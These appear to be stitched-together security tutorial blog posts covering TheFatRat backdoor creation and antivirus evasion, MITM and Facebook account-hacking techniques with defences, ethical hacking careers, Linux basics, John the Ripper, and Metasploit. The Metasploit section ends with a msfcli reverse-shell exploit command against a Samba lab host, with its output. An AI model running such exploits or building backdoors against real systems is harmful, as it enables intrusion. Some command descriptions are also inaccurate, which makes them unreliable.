TheFatRat is an exploitation tool that compiles malware with a well-known payload; the compiled malware can then be executed on Linux, Windows, Mac, and Android. It also provides an easy way to create backdoors and payloads that can bypass most anti-virus products.
What is a backdoor
A backdoor is a malware type that negates normal authentication procedures to access a system. As a result, remote access is granted to resources within an application, such as databases and file servers, giving perpetrators the ability to remotely issue system commands and update malware.
TheFatRat is a powerful tool and it also has many features which can impress you and convince you to use it.
Fully Automating MSFvenom & Metasploit.
Local or remote listener Generation.
Easily Make Backdoor by category Operating System.
Generate payloads in Various formats.
Bypass anti-virus backdoors.
File pumper that you can use for increasing the size of your files.
The ability to detect external IP & Interface address.
Automatically creates AutoRun files for USB / CDROM exploitation
Uses of TheFatRat
FatRat is used for exploitation.
FatRat is used to create malware.
TheFatRat is used to combine payload with malware.
Also, TheFatrat is used for creating Backdoors for Post Exploitation.
TheFatRat is used for browser attacks.
FatRat is used to get DDL files from Linux.
FatRat can create malware in different extensions.
After cloning is completed, type cd TheFatRat and then hit enter.
We can see the setup.sh file. To execute this file we need to give it executable permission; to do that, type chmod +x setup.sh in the terminal and hit enter.
Type sudo ./setup.sh and hit enter to start the installation; it will ask you for your root password. Then, an updating Kali repo popup appears, and the tool starts the installation process. It checks that all the tools needed to run FatRat are installed on the system. If some tools are missing, FatRat will auto-install them.
After the update window closes, TheFatRat asks whether to create a shortcut in the system; type y and hit enter. Take a cup of coffee and relax.
Then, after the installation is complete, type fatrat in the terminal and hit enter.
You must know that TheFatRat works together with the Metasploit Framework (MSF). MSF is far more than just a collection of exploits; it is also a solid foundation that you can build upon and easily customize to meet your needs. This allows you to concentrate on your unique target environment and not have to reinvent the wheel.
How to troubleshoot TheFatRat
The chk_tools script is for use in case of problems with FatRat’s setup.sh. It checks that everything is at the right version to run FatRat and also provides a solution for the problem.
chmod +x chk_tools
This article is for educational purposes only, usage of TheFatRat for attacking targets without prior mutual consent is illegal. We assume no liability and are not responsible for any misuse or damage caused by this program.
Do you want to get into the penetration testing field? If yes, we are going to discuss how you can stop being a script kiddie and become a good penetration tester. If you are reading this article, you are well on the way to becoming an expert in penetration testing.
The way has never been easy, but you can reach it if others have reached it. It depends on the energy and effort you are going to put into it.
Before we continue with this article, let us first see what penetration testing really is, because some people confuse penetration testing with ethical hacking.
Penetration testing is a type of security testing that is used to test the security of an application. It is conducted to find a security risk that might be present in a system.
When a system is not secure, it is easy for an attacker to get into it. A security weakness is normally an accidental error that occurs while developing a system.
Why is penetration testing important?
You must understand that penetration testing is very important for assuring system or network security. Penetration testing must also evaluate the system’s ability to be protected.
Also, penetration testing must assure that only external or internal authorized users can access the system.
Then, penetration testing is important because:
It provides evidence to suggest why it is important to increase investment in the security aspect of technology.
It also estimates the volume of the attack.
It helps avoid black hat attacks and also protects the original data.
It also helps to detect the weaknesses of the system.
Attention: penetration testing is not only about knowing the list of tools used for testing and how to use them. A real penetration tester must be able to proceed rigorously and detect the weaknesses of a system. They must be able to identify the technology behind them and test every single door that might be open to attackers.
Also, it is important to inform yourself about the law and what you are and are not allowed to do. Computer laws differ from country to country. First, check laws about privacy and surveillance: Nine eyes countries, Five eyes, and Fourteen Eyes. Always check if what you’re doing is legal. Even when it’s not offensive, information gathering can also be illegal!
The penetration tester not only discovers vulnerabilities that could be used by attackers, but must also be able to exploit those vulnerabilities to assess what attackers might gain after a successful exploitation.
How is penetration testing Beneficial?
The practice of penetration testing is growing in popularity, and it comes with several benefits.
Identify and resolve system vulnerabilities: penetration testers put themselves in a hacker’s position. By staying on the pulse of the cybersecurity world and regularly approaching IT systems from a cybercriminal’s perspective, penetration testers can identify a wide range of vulnerabilities and weaknesses in the system.
Gain valuable insights into digital systems: Reports from penetration testing can provide valuable details about the network or system, its weak points, and how to strengthen it.
Establish trust with your clientele: A cyberattack or data breach negatively affects the confidence and loyalty of your customers, vendors, and partners.
Protection from financial damage: A simple breach of a security system may cause millions of dollars of damage. Penetration testing can protect the organization from such damages.
Some vocabulary related to penetration testing
Penetration tester: Is an ethical hacker who practices security, tests applications and systems to prevent intrusions or find vulnerabilities.
Reverse engineering: Reverse engineering, also called back engineering, is the process by which a man-made object is deconstructed to reveal its designs, architecture, or to extract knowledge from the object. It is similar to scientific research, the only difference being that scientific research is about a natural phenomenon.
Social engineering: In the context of information security, it refers to psychological manipulation of people into performing actions or divulging confidential information.
Security researcher: Someone who practices pen testing and browses the web to find phishing/fake websites, infected servers, bugs, or vulnerabilities. They can work for a company as a security consultant and are most like a Blue team.
Penetration tester skills required
A penetration tester needs to know how to modify existing exploits to get them to work in specific networks for testing purposes. No single tester can possibly be an expert across all domains, but they need to be active learners and develop real-world experience.
Understanding of secure web communications and technologies
You need an understanding of web technologies. Web applications are a well-accepted portion of just about every assessment we do these days, and everybody needs to understand them. Our assessors need to know how web applications are built, how to identify input fields, and how to gather the information that can lead to exploiting the functionality of the web application.
Learning programming is the very first way to start learning about security. There are a lot of languages; most people start with Python, which is the easiest and the most popular one. PHP and Go are less popular for writing security-related tools, but any of these can still be used in such a context. Bash and PowerShell are mostly about scripting and writing simple CLI applications.
First, a CMS is computer software used to manage the creation and modification of digital content. Digging into the functionalities and security of CMS’s will open your door to a better understanding of how you can manage when in front of one below:
Steps of Penetration Testing
Before the tester starts the vulnerability analysis of a system, there are some crucial steps that he must follow. Each step is important in order to produce a good report after finishing the work.
The Kali Linux penetration testing platform contains a vast array of tools and utilities. From information gathering to final reporting, Kali Linux enables security and IT professionals to assess the security of their systems.
A man in the middle (MITM) attack is a general term for when a perpetrator positions himself in a conversation between a user and an application, either to eavesdrop or to impersonate one of the parties, making it appear as if a normal exchange of information is underway.
The goal of an attack is to steal personal information, such as login credentials, account details, and credit card numbers. Targets are typically the users of financial applications, SaaS businesses, e-commerce sites, and other websites where logging in is required.
Information obtained during an attack could be used for many purposes, including identity theft, unapproved fund transfers, or an illicit password change.
Additionally, a man in the middle attack requires three players: the victim, the entity with which the victim is trying to communicate, and the man in the middle, who is intercepting the victim’s communications. Critical to the scenario is that the victim isn’t aware of the MITM.
How does a Man In The Middle Attack work?
Let’s say you received an email that appeared to be from your bank, asking you to log in to your account to confirm your contact information. Then, you click on a link in the email received and are taken to what appears to be your bank’s website, where you log in and perform the requested task.
In such a scenario, the man in the middle (MITM) sent you the email, making it appear to be legitimate.
This attack also involves phishing, getting you to click on the email appearing to come from your bank.
Also, he created a website that looks just like your bank’s website, so you wouldn’t hesitate to enter your login credentials after clicking the link in the email. The moment you log in, you are not logging into your bank account; you are handing over your credentials to the attacker.
Man In The Middle attack progression
Man In The Middle attacks come in two forms, one that involves physical proximity to the intended target, and another that involves malicious software, or malware.
Successful MITM execution has two distinct phases: interception and decryption.
The first step intercepts user traffic through the attacker’s network before it reaches its intended destination.
The most common (and simplest) way of doing this is a passive attack in which an attacker makes free, malicious WiFi hotspots available to the public. Typically named in a way that corresponds to their location, they aren’t password protected. Once a victim connects to such a hotspot, the attacker gains full visibility to any online data exchange.
When an attacker wishes to take a more active approach to interception, he may launch one of the following attacks:
IP spoofing involves an attacker disguising himself as an application by altering packet headers in an IP address. As a result, users attempting to access a URL connected to the application are sent to the attacker’s website.
ARP spoofing is the process of linking an attacker’s MAC address with the IP address of a legitimate user on a local area network using fake ARP messages. As a result, data sent by the user to the host IP address is instead transmitted to the attacker.
DNS spoofing, also known as DNS cache poisoning, involves infiltrating a DNS server and altering a website’s address record. As a result, users attempting to access the site are sent by the altered DNS record to the attacker’s site.
After an interception, any two-way SSL traffic needs to be decrypted without alerting the user or application. A number of methods exist to achieve this:
HTTPS spoofing sends a phony certificate to the victim’s browser once the initial connection request to a secure site is made. It holds a digital thumbprint associated with the compromised application, which the browser verifies according to an existing list of trusted sites. The attacker is then able to access any data entered by the victim before it’s passed to the application.
SSL hijacking occurs when an attacker passes forged authentication keys to both the user and the application during a TCP handshake. This sets up what appears to be a secure connection when, in fact, the man in the middle controls the entire session.
SSL stripping downgrades an HTTPS connection to HTTP by intercepting the TLS authentication sent from the application to the user. The attacker sends an unencrypted version of the application’s site to the user while maintaining the secured session with the application. Meanwhile, the user’s entire session is visible to the attacker.
Blocking MITM attacks requires several practical steps on the part of users, as well as a combination of encryption and verification methods for applications.
Also, with the number of tools readily available to cybercriminals for carrying out Man In The Middle attacks, it makes sense to take steps to help protect your devices and your data.
Make sure you always visit websites over HTTPS.
Be wary of potential phishing emails from attackers asking you to update your password or any other login credentials. Instead of clicking on the link provided in the email, manually type the website address into your browser.
Never connect to public WIFI routers directly if possible. A VPN encrypts your internet connection on public hotspots to protect the private data you send and receive while using public WIFI, like passwords or credit card information.
Avoid WIFI connections that aren’t password protected.
For website operators, secure communication protocols, including TLS and HTTPS, help mitigate spoofing attacks by robustly encrypting and authenticating transmitted data. Doing so prevents the interception of site traffic and blocks the decryption of sensitive data, such as authentication tokens.
Facebook is, undoubtedly, the most popular social networking website with more than 500 million active users. Due to its popularity, many bad guys (black hackers) are actively involved in hacking Facebook accounts of unsuspecting users. Most people may ask why hackers hack Facebook accounts.
This article outlines strategies that hackers use to gain access to the Facebook accounts of hundreds of users each day. Also, you will see how you can prevent some attacks from hacking your account. In the previous article, we discussed how to protect the Facebook account from hackers.
Why do bad guys try to hack Facebook accounts?
As I mentioned above, Facebook is a popular social networking website; this brings many people to try to access someone’s Facebook account without his consent.
You must also know that hackers can try to access your account to modify your information, expose your information, or maybe for fun. Some beginners in hacking (script kiddies) try to use hacking tools developed by professional hackers to hack Facebook accounts. Also, they can try to hack a Facebook account because of:
Exposing your information.
Modifying your data
Because of love reasons
For joking or celebrity.
How do they hack Facebook accounts, and which techniques do they use?
Although Facebook is more secure, there are some techniques hackers use to hack Facebook accounts, like phishing, keylogging, Trojans/backdoors, sniffing, social engineering, and session hijacking …
Phishing – hack Facebook accounts
Phishing is one of the easiest ways to trick users into giving out their login credentials. All a hacker does is set up a webpage similar in design to that of the Facebook homepage, attach a server-side script to track the username and password entered, and store it in a log.
A new trend amongst phishers is creating Facebook look-alike widgets for stealing users’ login credentials. The hacker sends you the link by using some attractive words or other techniques like:
Hey, do you know that Facebook has a new update? Install the new update by following this link.
After the hacker has sent you the link and the attractive message, he waits for you to log in so that he gets your information, and your account is hacked. Nowadays Facebook blocks phishing links. However, know that it can’t block phishing links if the hacker uses another method to send the link.
How to prevent yourself from being phished?
At all costs, avoid clicking on suspicious links. Moreover, always check the URL in the address bar before signing in. Avoid logging in through various “Facebook widgets” offered by websites and blogs. Instead, use Facebook’s homepage to sign in.
Always try to use Safe Search while searching. If you do manage to get phished, report the website so that others may get a warning before visiting it. You can also read our article on how to secure a Facebook account from hackers to protect against attacks.
Keylogging – hack Facebook accounts
A keylogger is a type of computer virus that tracks keystrokes. Keyloggers can be installed remotely on a computer system by a cracker to record all the activity that is going on on the victim’s computer. Also, it gets easier if the hacker has physical access to the victim’s computer.
Also, know that with this technique a hacker can record all your activities; he can get your username, password, and other information.
How to stop keyloggers?
If you want to stop being keylogged, install a good antivirus and update it frequently. Do not click on suspicious links and avoid downloading illegal software. Also, avoid installing free toolbars and other such spam software. Always scan third-party flash and pen drives before using them on your computer.
Social engineering is the art or better yet, science, of skillfully maneuvering human beings to take action in some aspect of their lives.
Also, social engineering involves using any trick to fool the user into making himself vulnerable to exploits. This could involve anything from sending spoof emails, pretending to be from Facebook, telling you to change your password to 123456 to a hacker maliciously getting out the answer to your Security Question in a friendly chat or discussion.
How to prevent yourself from being socially engineered?
The only true way to reduce the effect of these attacks is to know that they exist, to know how they are done, and to understand the thinking process and mentality of the people who would do such things. Also, stay aware during chats and discussions.
Also, use a tough security question, preferably one whose answer you would never disclose to anyone. Moreover, Facebook, or any other company for that matter, will never ask you to change your password or do something as silly as asking you to send out your login details to prove that you are an active user.
Always think before taking action and your e-life on Facebook will be safe from hackers looking to hack Facebook accounts.
Also, hackers try to hack your email address to get into your account. It can be easy for a hacker to access your account if he knows your email account used on your Facebook account.
I know you may ask yourself how this can be possible, but know that a hacker can use a brute force attack to get your password and access your account, which is why you should avoid making your email account public. I recommend you read our article on how to protect the Facebook account from hackers.
This guide is all about how to become an ethical hacker. Before we continue, we first have to know who ethical hackers are and what they can do. Becoming an ethical hacker may seem easy in theory, but to become a good hacker you have to follow some steps.
Who is a hacker?
The word hacker originally defined a skilled programmer proficient in machine code and computer operating systems. Also, a hacker is a person who breaks into a computer system. The reason for hacking can be many: installing malware, stealing, or destroying data.
Hackers can be also there to find software vulnerabilities in order to fix them.
How does hacking work?
Hackers breach defenses to gain unauthorized access into computers, phones, tablets, IoT devices, networks, or entire computing systems. Hackers also take advantage of weaknesses in network security to gain access. The weaknesses can be technical or social in nature. Let us also see some types of hackers.
Now that you already know who a hacker is, let us also see what ethical hacking is.
What is ethical hacking?
Ethical hacking involves the legal use of hacking techniques for benevolent versus malicious purposes. Ethical hackers use penetration testing and other tactics to find software vulnerabilities and other security weaknesses so they can be promptly addressed.
Who is a penetration tester?
Many people think that a Penetration Tester is just a White Hat Hacker, but this is wrong… A White Hat Hacker is anyone who works or fights to protect cyber security…
Penetration Testers are essentially Gray Hat Hackers. They are between the two worlds… this makes Penetration Testers be the most Advanced Hackers because they know how to attack and how to protect!
Who is an ethical hacker?
The term ethical hacker includes all security professionals that provide offensive services, whether red team, pentester, or freelance offensive consultant. Also, an ethical hacker’s primary purpose is to view security from the adversary’s perspective in an effort to find vulnerabilities that could be exploited by bad actors.
Role of an ethical hacker
Ethical hackers can be independent freelance consultants, employed by a firm that specializes in simulated offensive cybersecurity services, or they can be an in-house employee protecting a company’s website or apps.
Possessing ethical hacker skills and knowledge is helpful for many other security roles.
Now we can see how to become an ethical hacker, as you already know who he is and what he can do.
The skills required to become an ethical hacker
While there are plenty of anecdotal stories of blackhat hackers being converted to be whitehats in a bygone era, the most important requirement for becoming a successful ethical hacker today is to have, as is found in the name, high ethical standards.
Ethics are what separates the good guys from the bad guys. There are plenty of blackhat hackers that have adequate technical skills to be ethical hackers, but they lack the discipline of character to do the right thing regardless of the perceived benefits of doing otherwise.
A candidate for an ethical hacker job must be able to demonstrate advanced cybersecurity technical skills. The ability to recommend mitigation and remediation strategies is a part of the desired experience.
To become an ethical hacker you have to understand the networks.
A hacker should be able to gather information about a network with the intent to secure the network system. He can also use various tools like Telnet, NS lookup, Ping, Tracert, etc.
Also, an ethical hacker must know about networking and how a network works. He must know the fundamentals of networking, such as network models, IP addresses, and network protocols. Networking skills are very important in the ethical hacking field. Almost all devices are connected to the network.
An ethical hacker must be proficient with operating systems, especially Windows and Linux.
Linux System hacking
Linux is an operating system that acts as an intermediary, a bridge between the physical device and the instruction code of the program. In our previous article, we discussed the Linux tutorial for beginners.
You may find that many people on the internet say that you don’t need to know how to program to be a hacker. I don’t judge them, but programming is more important in hacking. Sure, you may perform some attacks without programming skills by using other people’s scripts, but at a given point you will need programming skills.
Programming languages that an ethical hacker needs to know
How to get experience as an ethical hacker
Experience with vulnerability testing tools, such as Metasploit, Netsparker, and OpenVAS, is very helpful for ethical hackers. These tools, and there are many more of them, are designed to save time when searching for known vulnerabilities. These or similar tools may provide a useful framework for vulnerability scanning and management but should represent only the starting point for an experienced ethical hacker. Also, get hands-on with the Kali Linux operating system.
What is the Outlook for Ethical Hackers?
Cyberwarfare is extremely common, and many high-profile enterprises have been subject to major hacking issues. In this day and age, spending on IT security on a global scale is reaching the trillion-dollar mark. What better way to combat the threat of black-hat hacking than by making use of an army of white-hat hackers?
The demand for ethical hackers is at an all-time high and rising. Many experienced, ethical hackers can expect to earn in excess of $120,000 per year, especially if they are running their own consultancies or penetration testing companies.
Dear friends, the big day has finally arrived. If you are reading basic Linux commands for beginners I suppose that you have already read our previous article, Linux tutorial for beginners, and if not yet I suggest you have a look at it in order to be on the same level otherwise continue reading. You will get the chance to write your first command in the console! Okay, not too stressed?
I assure you, we will start with simple things to become familiar with the console. We’ll really see the ABC, the basic survival guide of kits.
Basic Linux Commands for beginners
Then, let us see what this article is going to cover.
First Commands on Linux command Line
Understand Super User on Linux
Commands & parameters
File operation Commands
account manager commands
What is the Linux shell?
Before we continue, let me remind you what a Linux shell is. A Linux shell is a command-line interpreter that provides a traditional user interface for the Linux operating system and for Linux-like systems. The shell understands plenty of shell commands and their options, which change their action. The typical syntax of a shell command looks like this: command -option argument (parameter).
Then, the time to test your first command is now; open your Linux command line to write your first command. Also, know that on my side I use Kali Linux, and all the commands you will find in this article were tested on Kali.
This is a command prompt. It is a message that prompts you to enter a command by giving you at the same time a lot of information. This command prompt is displayed before each command you type.
Now let us explain what you are seeing in the command line.
Anonymous: The first element is your nickname. This is the user name under which you are logged in. Indeed, know that you can create multiple user accounts on Linux.
@: This symbol indicates nothing special. It’s the symbol “at”.
DESKTOP-4312L0R: That’s the name of the computer on which you are working. In my case it’s called DESKTOP-4312L0R, but I could give any name during OS installation.
~: That’s the folder where you currently are. You can also navigate folder to folder in the console and it’s very useful that you always be reminded where you are before each command.
$: Also, that symbol is very important, because it shows you your authority level. This symbol means you are currently a normal user with limited rights. If you are curious and you want to know why limited rights read the previous post about Linux tutorial for beginners-Linux guide in 2021.
Tasksel: This is a command to install some additional Linux components.
Understand Super User in Linux
In this part, we are going to see who root is. Then, let us see what superuser really means. Know that in some distributions of Linux you are not allowed to log in as a superuser for security reasons, which is why by default Linux lets you log in as a normal user.
Then, once you have logged in, you can run commands as root, but first you have to run the command sudo su, and then it will ask you to confirm with the password. When you type a password, nothing is shown on screen; once you have typed the right password, confirm with the Enter key.
$: This symbol means you are currently using a user “normal” account with limited rights (he cannot change the most important system files).
Also, if the symbol is “#”, that means you are in superuser mode. That is to say, you are connected under the pseudonym “root”. Root is the master who has the right to do everything on the computer; he can even run harmful commands.
Parameters & basic Linux commands
Command: It is a directive to a computer program acting as an interpreter of some kind, in order to perform a specific task. In Linux, when you type a command you are ordering the terminal to execute a task for you.
Example: mkdir genius – here you ask the computer to create a folder named genius.
Parameters: Parameters are options that are written after the command. The command and parameters are separated by a space. The parameters themselves can contain spaces, letters, numbers … a bit of everything, really. There is no real rule on how parameters are written, but fortunately programmers have adopted a sort of “agreement” so that we can recognize the different types of parameters.
Also, know that there are two different kinds of parameters.
Short parameters: The most common parameters consist of a single letter preceded by a dash. For instance: -d, -l, -a.
If you have to give several parameters, you can do it like this: -d -a -U -h. Also, you have to know that each parameter has a different meaning.
Long parameters: These parameters consist of several letters and are preceded by two dashes, like this: --all, --version, --help.
Commands and parameters Examples
Then, let’s have a further look about the commands and their parameters.
su -l: switch user (su: log in as the root superuser, and -l: is a parameter meaning “login”).
ls -a: list all contents (ls: list content, and -a: is a parameter meaning “all contents”).
rm -ri genius: (rm: removes a file or a directory, -ri: is a parameter meaning remove a non-empty directory and its contents, asking for confirmation before each removal, and genius is the name of the directory to remove.)
usermod -l genius anonymous: (usermod: modify an existing user account, -l: is a parameter meaning “login name change”, genius: is the new user name we want to set, and anonymous: is the old user name; the new name comes first).
whoami: shows the current user name; the output is “Anonymous”.
File operation Basic Linux Commands
Then, let us discuss how we can manage files on the CL. Managing files on the Linux command line is not as complicated as beginners may think.
cp myfile genius/: the command cp: copy, myfile: is the name of the file you want to copy, and genius: is the directory where you want to copy myfile.
mv myfile genius/: mv: command to move a file, myfile: is the name of the file you want to move, and genius: is the directory where you want to move myfile.
rm genius: rm: command to remove a file or directory, and genius: name of the file you want to remove. Also, you can use -ri as parameters if you want to remove a directory with all its contents.
wc myfile.txt: This is a command to count words on a given file. wc: show word count, and myfile.txt: Name and extension of the file.
lpr myfile.txt: the command of sending the myfile.txt to the printer. lpq command help to display the print queue
diff myfile1.txt myfile2.txt: the command diff: show the differences between two files, myfile1.txt: is the file to compare to myfile2.txt.
cmp file1.text file2.txt: this is the command to compare two files byte by byte.
Md5sum myfile.txt: this command will create an md5 checksum number. Output: f7tkgu5orj1fjt8kelc2os95nd57jf8r myfile2.txt.
grep hacking myfile.txt: the command grep: show all lines that contain “hacking” string. It shows a specified string.
egrep excellent myfile.txt: It seems similar with grep but the difference is that this command show the unique lines in the file.
look ab: this command show words matching a given prefix. The output will be: aba,abb,abc,abd…
Also, you may find that managing directories is simple as a beginner. Then, in this part we won’t see many commands but you can do research to get more.
mkdir genius: this command hell to create a new directory with the name genius.
rmdir genius: help to remove an empty directory. That mean you ask to the CL to remove the directory genius.
zip myfile.txt: this file help to compress a file to zipe format.
unzipmyfile.zip: Also, this command help to unzip a file from zip format.
Account manager Commands
Let us see how we can manage user accounts using the command line.
useradd username: add a new user account.
usermod -l newname oldname: Also, helps to change the username.
userdel username: this command helps to delete a user account.
passwd username: set a user account password.
Permission basic Linux commands
chmod 752 myfile.txt: the command chmod: change the mode of access permission for myfile.txt, 7: set user permission with read, write, execute, 5: set group permission with read, execute, 2: set others permission with write only.
chgrp groupname myfile.txt: chgrp: change the group membership of a file. Also, groupname is the name of a given group, if you created a group.
chown username myfile2.txt: the command chown: change ownership of myfile2.txt.
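The octal digits in chmod 752 can be decoded mechanically. The shell functions below are an added example, not part of the original article: they turn a three-digit mode into rwx notation and flag modes, like 752, that let “others” write to a file. All function names are made up for this illustration.

```shell
#!/bin/sh
# Added example (not from the original article). Function names are hypothetical.

# digit_to_rwx DIGIT: print the rwx triplet for one octal digit, e.g. 5 -> r-x
digit_to_rwx() {
    case "$1" in
        0) echo "---" ;; 1) echo "--x" ;; 2) echo "-w-" ;; 3) echo "-wx" ;;
        4) echo "r--" ;; 5) echo "r-x" ;; 6) echo "rw-" ;; 7) echo "rwx" ;;
        *) return 1 ;;
    esac
}

# mode_to_rwx MODE: print user/group/others triplets, e.g. 752 -> rwxr-x-w-
# Exits with status 1 when MODE is not exactly three octal digits.
mode_to_rwx() (
    mode=$1
    case "$mode" in
        [0-7][0-7][0-7]) ;;
        *) echo "invalid mode: $mode" >&2; exit 1 ;;
    esac
    u=${mode%??}        # first digit: user (owner)
    rest=${mode#?}
    g=${rest%?}         # second digit: group
    o=${mode#??}        # third digit: others
    printf '%s%s%s\n' "$(digit_to_rwx "$u")" "$(digit_to_rwx "$g")" "$(digit_to_rwx "$o")"
)

# others_can_write MODE: status 0 when the "others" digit has the write bit (2),
# status 1 when it does not, status 2 when MODE is malformed.
others_can_write() (
    case "$1" in
        [0-7][0-7][0-7]) ;;
        *) exit 2 ;;
    esac
    o=${1#??}
    [ $(( $o & 2 )) -ne 0 ]
)

# find_world_writable DIR: list regular files under DIR that anyone can modify.
find_world_writable() {
    find "$1" -type f -perm -0002 -print
}

# Demo with the mode used in the article.
printf '752 -> %s\n' "$(mode_to_rwx 752)"
others_can_write 752 && echo "752: writable by others, avoid on sensitive files"
```

Running find_world_writable on a directory such as a web root or a home directory is a quick audit for files that any local user could tamper with.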
System basic Linux commands
jobs: this command displays the status of all jobs.
fg: Also, this command runs a suspended job in the foreground.
bg: runs a suspended job in the background.
kill %4: this command kills a job by number or a process by PID.
at 9:30 pm: Also, this command helps to schedule a job to run at a specified time. You can also display the scheduled jobs with the at command, and if you want to remove a scheduled job, use the atrm command.
uptime: It shows the system uptime.
top: Also, helps to view the top active or specified processes.
tar -xf archive.tar: it helps to extract an archived tar file.
tar -cf archive.tar myfile.txt: creates an archived tar file.
date: also, helps to display the date and time.
cal: it helps to display a calendar of the month.
df: This command helps to show the disk usage of the file system.
host tgeniusclub.com: displays the remote hostname and IP.
ifconfig: Also, displays the local network configuration.
ping -c 3 tgeniusclub.com: it sends packets to test if the remote host is reachable.
ssh: securely connect to a remote computer.
ftp: transfers files using the “File Transfer Protocol”.
mesg: it enables or disables messaging.
write: writes a message to other users.
open: it helps to connect to an ftp server.
mail: Also, sends and receives mail locally and globally.
dhclient: provides a means for configuring one or more network interfaces.
nslookup: queries internet name servers interactively for IP information.
Well done. This article covered only basic Linux commands; hope you are now able to use your CL. If you want to know more about a command, just use the command man “name of command”.
John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.
Many people are asking this question: “How can I crack any password?” If you are reading this post, don’t worry, you are in a good place. In this article, we are going to dive into John the Ripper (JtR); you will see how it works and why it’s important to use it.
In the previous article, we saw how to install and start with Kali Linux. Now in this article, we are going to see how to start with John the Ripper and how to use it. First, let us see what John the Ripper is.
What is John the Ripper?
First, you have to know that John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems. It is designed to be both feature-rich and fast. It combines several cracking modes in one program and is fully configurable for your particular needs.
John the Ripper is available for several different platforms which enables you to use the same cracker everywhere. Also, It can support hundreds of hash and cipher types.
How can I get John the Ripper?
This is a question that people may well ask, because after knowing what John the Ripper is, the next question must be how to get it. Now that you know what John the Ripper is, let us see how to get it.
As I mentioned before John the Ripper is free and Open Source software, distributed primarily in source code form. If you would rather use a commercial product, please consider John the Ripper Pro, which is distributed primarily in the form of “native” packages for the target operating systems and in general is meant to be easier to install and use while delivering optimal performance.
Now, you can download John the Ripper on Linux, macOS, Windows, and Android on its official page Openwall.com/john. You must verify the authenticity and integrity of your John the Ripper downloads to make sure you downloaded a good one. Once you visit the official page you will get more information about that.
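One way to check the integrity of a download, as an added example that is not from the original article or from the John the Ripper project: compare the file's SHA-256 digest with a published value. It assumes the publisher lists a SHA-256 digest and uses sha256sum, a sibling of the md5sum command shown earlier; verify_download is a hypothetical helper name.

```shell
#!/bin/sh
# Added example (not from the original article). verify_download is a
# hypothetical helper; it assumes a SHA-256 digest published by the vendor.

# verify_download FILE EXPECTED_HEX
# exit status: 0 = digest matches, 1 = mismatch, 2 = unusable input
verify_download() (
    file=$1
    # Published digests are sometimes upper case; compare in lower case.
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')

    [ -f "$file" ] || { echo "missing file: $file" >&2; exit 2; }

    # Reject anything that is not 64 hexadecimal characters before comparing,
    # so a truncated or mistyped value is reported as bad input, not a mismatch.
    case "$expected" in
        ""|*[!0-9a-f]*) echo "not a hex digest" >&2; exit 2 ;;
    esac
    [ "${#expected}" -eq 64 ] || { echo "not a SHA-256 digest" >&2; exit 2; }

    # Reading from stdin keeps the file name out of sha256sum's output.
    actual=$(sha256sum < "$file" | cut -d ' ' -f 1)

    if [ "$actual" = "$expected" ]; then
        echo "OK: $file"
    else
        echo "MISMATCH: $file" >&2
        exit 1
    fi
)

# Demo on a constructed file: the SHA-256 of the three bytes "abc" is a
# well-known test vector.
demo=$(mktemp)
printf 'abc' > "$demo"
verify_download "$demo" ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad
rm -f "$demo"
```

A matching digest proves integrity only if the digest itself came from a trusted source, which is why the article points to the official page for the verification procedure.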
This is another question that some of you must ask, so let us respond to this question to satisfy everyone.
John the Ripper is a primary password cracker used during pen-testing exercises that can help IT guys spot weak passwords and poor password policies. It also supports several common encryption technologies for Unix and Windows-based Systems. It also autodetects the encryption on the hashed data.
John the Ripper also includes its own wordlists of common passwords for 20+ languages. John the Ripper is included in the pen-testing versions of Kali Linux.
John the Ripper uses the dictionary attack. It takes text string samples from a wordlist. It also offers brute force attacks. In this type of attack, John the Ripper goes through all the possible plaintexts, hashing each one and then comparing it to the input hash.
Also, it uses character frequency tables to try plaintext containing more frequently used characters first.
The Metasploit Framework (MSF) is far more than just a collection of exploits–it is also a solid foundation that you can build upon and easily customize to meet your needs. This allows you to concentrate on your unique target environment and not have to reinvent the wheel.
Metasploit is one of the single most useful security auditing tools freely available to security professionals today. With components ranging all the way to network information gathering tools and web vulnerability plugins, the Metasploit Framework provides a truly impressive work environment. Also, when speaking about Metasploit we can’t forget to speak about Kali Linux.
Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. It contains several hundred tools that are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering.
Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.
Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques.
The VM will run on any recent VMware products and other virtualization technologies such as VirtualBox.
You can download the image file of Metasploitable 2 from SourceForge. Once you have downloaded the Metasploitable VM, extract the zip file, open up the .vmx file using your VMware product of choice, and power it on. Then after a brief time, the system will be booted and ready for action. The default login and password is msfadmin:msfadmin.
Metasploit is written in Ruby and has been in development for many years. One can more easily understand the Metasploit architecture by taking a look under its hood.
In learning how to use Metasploit, take some time to make yourself familiar with its filesystem and libraries. In Kali Linux, Metasploit is provided in the metasploit-framework package and is installed in the /usr/share/metasploit-framework directory, the top-level of which is shown below.
METASPLOIT OBJECT MODEL
In the Metasploit Framework, all modules are Ruby classes.
Modules inherit from the type-specific class
The type-specific class inherits from the Msf::Module class
There is a shared common API between modules
Payloads are slightly different.
Payloads are created at runtime from various components
Glue together stagers with stages
There are many different interfaces to use with this hacking tool, each with its own strengths and weaknesses. There is no one perfect interface to use with the Metasploit console, although the MSFConsole is the only supported way to access most Metasploit commands.
It is still beneficial, however, to be comfortable with all Metasploit interfaces.
The msfcli provides a powerful command line interface to the framework. This allows you to easily add Metasploit exploits into any scripts you may create.
Command Line Interface Commands
For msfcli help: type msfcli -h.
Note: when using msfcli, variables are assigned using the “equal to” operator =, and all options are case-sensitive.
root@kali:~# msfcli exploit/multi/samba/usermap_script RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse LHOST=172.16.194.163 E
[*] Please wait while we load the module tree...
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 936 exploits - 500 auxiliary - 151 post
+ -- --=[ 252 payloads - 28 encoders - 8 nops
=[ svn r15767 updated today (2012.08.22)
RHOST => 172.16.194.172
PAYLOAD => cmd/unix/reverse
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cSKqD83oiquo0xMr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "cSKqD83oiquo0xMr\r\n"
[*] A is input...
